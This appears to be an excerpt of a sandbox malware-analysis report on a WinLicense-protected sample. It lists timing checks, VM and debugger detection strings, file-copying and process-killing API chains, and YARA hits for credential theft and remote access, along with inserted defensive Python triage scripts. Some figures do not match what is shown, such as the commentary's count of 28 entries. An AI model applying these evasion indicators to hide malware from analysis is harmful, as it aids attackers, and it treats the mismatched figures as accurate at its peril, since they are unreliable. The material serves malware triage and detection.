              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470409 second address: 5470457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F11A1057FB8h 0x00000013 add ah, 00000068h 0x00000016 jmp 00007F11A1057FABh 0x0000001b popfd 0x0000001c jmp 00007F11A1057FB8h 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470457 second address: 547046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547046D second address: 5470471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470471 second address: 547048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
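The interceptor entries above are hard to read as a list. The Python below is an added example, not part of the Joe Sandbox report: it parses entries in exactly this format, recovers the instructions executed between the two rdtsc reads, chains consecutive entries whose second address is the next entry's first address (so the list collapses into a few runs of back-to-back reads), and flags entries whose measured region contains arithmetic rather than only stack and branch filler. The input is six entries copied from the list above; nothing else is assumed. A sandbox that intercepts rdtsc, as this one does, makes every read expensive, which is what the protector's back-to-back reads are measuring.

```python
import re
from dataclasses import dataclass

# Constructed input: six "RDTSC instruction interceptor" entries copied from the
# report above (the "Source:" prefix is dropped; parse_entry ignores it anyway).
SAMPLE_ENTRIES = [
    "RDTSC instruction interceptor: First address: DDFBE2 second address: DDFBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: DDFBE8 second address: DDFBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: DDFBEC second address: DDFC1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A1057FB9h 0x0000000d jmp 00007F11A1057FB2h 0x00000012 rdtsc",
    "RDTSC instruction interceptor: First address: 547021B second address: 547021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 547021F second address: 5470225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: 5470225 second address: 547027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 08h 0x0000000d pushfd 0x0000000e jmp 00007F11A12050C3h 0x00000013 sub cx, A9CEh 0x00000018 jmp 00007F11A12050C9h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F11A12050BCh 0x00000027 rdtsc",
]

ENTRY_RE = re.compile(
    r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)
# One "0xOFFSET text" item; the lookahead stops before the next offset marker.
INSN_RE = re.compile(r"0x([0-9a-f]{8}) (.*?)(?= 0x[0-9a-f]{8} |$)")

# Integer/flag arithmetic that would mean the measured region does real work.
ALU_MNEMONICS = {
    "add", "sub", "adc", "sbb", "xor", "and", "or", "not", "neg", "cmp", "test",
    "shl", "shr", "sal", "sar", "rol", "ror", "inc", "dec", "mul", "imul", "div", "idiv",
}


@dataclass
class RdtscPair:
    first: int    # address of the first rdtsc
    second: int   # address of the second rdtsc
    insns: list   # [(offset, "mnemonic operands"), ...]

    @property
    def span(self) -> int:
        """Distance between the two reads as the report states it."""
        return self.second - self.first

    @property
    def last_offset(self) -> int:
        """Listing offset of the second rdtsc; smaller than span when the
        path between the reads goes through jumps."""
        return self.insns[-1][0]

    def between(self) -> list:
        """Instructions executed between the two reads."""
        return [text for _, text in self.insns[1:-1]]


def parse_entry(line: str) -> RdtscPair:
    m = ENTRY_RE.search(line)
    if not m:
        raise ValueError(f"not an RDTSC interceptor entry: {line!r}")
    first, second, listing = m.groups()
    insns = [(int(off, 16), text) for off, text in INSN_RE.findall(listing)]
    if len(insns) < 2 or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("listing does not start and end with rdtsc")
    return RdtscPair(int(first, 16), int(second, 16), insns)


def alu_ops(pair: RdtscPair) -> list:
    """Arithmetic between the reads (empty for a bare timing probe)."""
    return [t for t in pair.between() if t.split()[0] in ALU_MNEMONICS]


def chains(pairs: list) -> list:
    """Group entries into runs where one pair's second rdtsc is the next
    pair's first rdtsc, i.e. consecutive reads of one timing loop."""
    by_first = {p.first: p for p in pairs}
    seconds = {p.second for p in pairs}
    runs = []
    for head in sorted(pairs, key=lambda p: p.first):
        if head.first in seconds:
            continue                      # continuation, not a head
        addrs, cur, seen = [head.first], head, set()
        while cur is not None and cur.first not in seen:
            seen.add(cur.first)
            addrs.append(cur.second)
            cur = by_first.get(cur.second)
        runs.append(addrs)
    return runs


def summarize(lines: list) -> dict:
    pairs = [parse_entry(l) for l in lines]
    return {
        "pairs": len(pairs),
        "chains": chains(pairs),
        "with_alu": [hex(p.first) for p in pairs if alu_ops(p)],
    }


if __name__ == "__main__":
    for run in summarize(SAMPLE_ENTRIES)["chains"]:
        print(" -> ".join(f"{a:X}" for a in run))
```

Run against the full list, the 28 entries above fall into a handful of chains (the DDFBxx and 5470xxx runs are two of them), which is the picture an analyst wants: a few timing loops, not dozens of independent checks. The ALU flag separates bare probes from probes wrapped in junk arithmetic under pushfd/popfd, which matters when the goal is a signature for the protector rather than for this sample.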
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B4F9D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B4FA9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CF144C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CEFD08 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D1BE16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-27044)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-25862)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00913910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00911250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00911269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00912390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00914B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00914B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00921BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1518473176.0000000001646000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1518473176.0000000001612000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25848)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25856)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25701)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25721)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00904A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00926390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00922AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
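The window class names, SoftICE device names, VM registry values and protector strings listed in this section and in the sandbox-evasion entries above are the artifacts a triage script can look for in a memory dump or unpacked image, independent of the sandbox. The Python below is an added example, not part of the Joe Sandbox report: it scans a buffer for exactly those strings, in both ASCII and UTF-16LE (Windows window-class and registry strings are often stored wide), and folds the hits into the same families the report's signatures use. The sample dump is constructed; the \\.\ device-path prefix on the SoftICE names is this example's assumption, since the report lists only the bare names.

```python
# Indicator strings taken from this report's "Open window title or class name",
# "File opened", "Registry key queried" and "Binary or memory string" entries.
# The SoftICE names are matched as \\.\NAME device paths (this example's
# assumption; the report lists only the bare names).
INDICATORS = {
    "debugger_window": [
        "ollydbg", "gbdyllo", "procmon_window_class", "filemonclass", "regmonclass",
        "process monitor - sysinternals", "registry monitor - sysinternals",
        "file monitor - sysinternals",
    ],
    "softice_device": ["\\\\.\\NTICE", "\\\\.\\SICE", "\\\\.\\SIWVID"],
    "vm_artifact": [
        "HARDWARE\\ACPI\\DSDT\\VBOX__", "VMwareVMware", "Hyper-V RAW",
        "SystemBiosVersion", "VideoBiosVersion",
    ],
    "protector": ["Oreans.vxd", "Software\\WinLicense", "XprotEvent"],
}

# Constructed stand-in for a process memory dump: a few of the strings above,
# one of them stored as UTF-16LE, padded with unrelated bytes.
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + b"Software\\WinLicense\x00"
    + "OLLYDBG".encode("utf-16-le") + b"\x00\x00"
    + b"\\\\.\\SICE\x00"
    + b"harmless text that mentions a file monitor\x00"
)


def scan(buf: bytes) -> dict:
    """Return {category: {indicator: [(encoding, offset), ...]}} for every
    indicator found in buf, case-insensitively, as ASCII or UTF-16LE."""
    low = buf.lower()            # bytes.lower() only touches ASCII letters,
    hits = {}                    # so it is safe on binary data
    for category, needles in INDICATORS.items():
        for needle in needles:
            for enc, pattern in (
                ("ascii", needle.lower().encode("ascii")),
                ("utf16", needle.lower().encode("utf-16-le")),
            ):
                off = low.find(pattern)
                if off != -1:
                    hits.setdefault(category, {}).setdefault(needle, []).append((enc, off))
    return hits


def classify(hits: dict) -> list:
    """Collapse the hit categories into the report's signature families."""
    tags = set()
    if "debugger_window" in hits or "softice_device" in hits:
        tags.add("anti-debug")
    if "vm_artifact" in hits:
        tags.add("anti-vm")
    if "protector" in hits:
        tags.add("protector")
    return sorted(tags)


if __name__ == "__main__":
    found = scan(SAMPLE_DUMP)
    for category, needles in found.items():
        for needle, where in needles.items():
            print(f"{category:16} {needle!r:32} {where}")
    print("tags:", classify(found))
```

Point it at the .sdmp regions named in this report (the 0xCD1000 image region carries the protector strings, the 0x15CE000 and 0x1646000 heap regions the VM strings). The registry value names SystemBiosVersion and VideoBiosVersion are only weak evidence on their own; they become meaningful next to the VBOX and VMware strings, which is why the classifier works on categories rather than single hits.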

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: LRy\Program Manager
Source: file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oLRy\Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00922D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00921B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00922A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00922C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (14 tactic columns separated by " | ", one matrix row per line; a count in parentheses is the number of report signatures mapped to that technique, cells without a count are unmatched)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
